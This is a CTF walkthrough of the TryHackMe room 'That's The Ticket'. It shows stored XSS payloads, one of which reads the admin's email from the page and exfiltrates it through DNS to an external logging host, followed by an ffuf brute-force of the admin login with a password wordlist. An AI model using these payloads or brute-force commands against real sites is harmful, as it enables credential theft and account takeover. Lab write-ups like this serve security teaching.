This is a write-up/walkthrough of the room That’s The Ticket from TryHackMe.

Nmap Scan

First of all, we will do an Nmap scan

~ nmap -sC -sV -oN initial.nmap $IP

We get the following results Nmap Scan

Website

If we visit the website we see the following: Ticket Manager

Click on register and create an account.

We then get taken to this dashboard: Dashboard

We can try basic XSS in the ticket input:

</textarea><script>alert(1)</script>

This works and we get the following: XSS

DNS and HTTP Logger

If we go back to TryHackMe, we see that it is recommending the HTTP & DNS Logging tool on http://10.10.10.100 HTTP and DNS Logging tool

We can now use the following XSS payload,

</textarea><img src="http://6df3160f18c599e89ea88cfb89e13ee8.log.tryhackme.tech">

Getting the admin email

We can use the following XSS payload,

</textarea>
<script>
var email = document.getElementById("email").innerText;
email = email.replace("@", "aaa")
email = email.replace(".", "ooo")
document.location = "http://"+ email +".6df3160f18c599e89ea88cfb89e13ee8.log.tryhackme.tech"
</script>

And we will receive the following request:

Admin email

Getting the admin password

We can get the admin password by bruteforcing with ffuf.

ffuf -w /usr/share/wordlists/rockyou.txt  -d "email=<ADMINEMAIL>&password=FUZZ" -u http://$IP/login -fw 475 -H "Content-Type: application/x-www-form-urlencoded"

This will get the admin password which we can login with Admin Account

Support Ticket

We can then read ticket 1 to get the flag!

Ticket 1

And that is the room complete!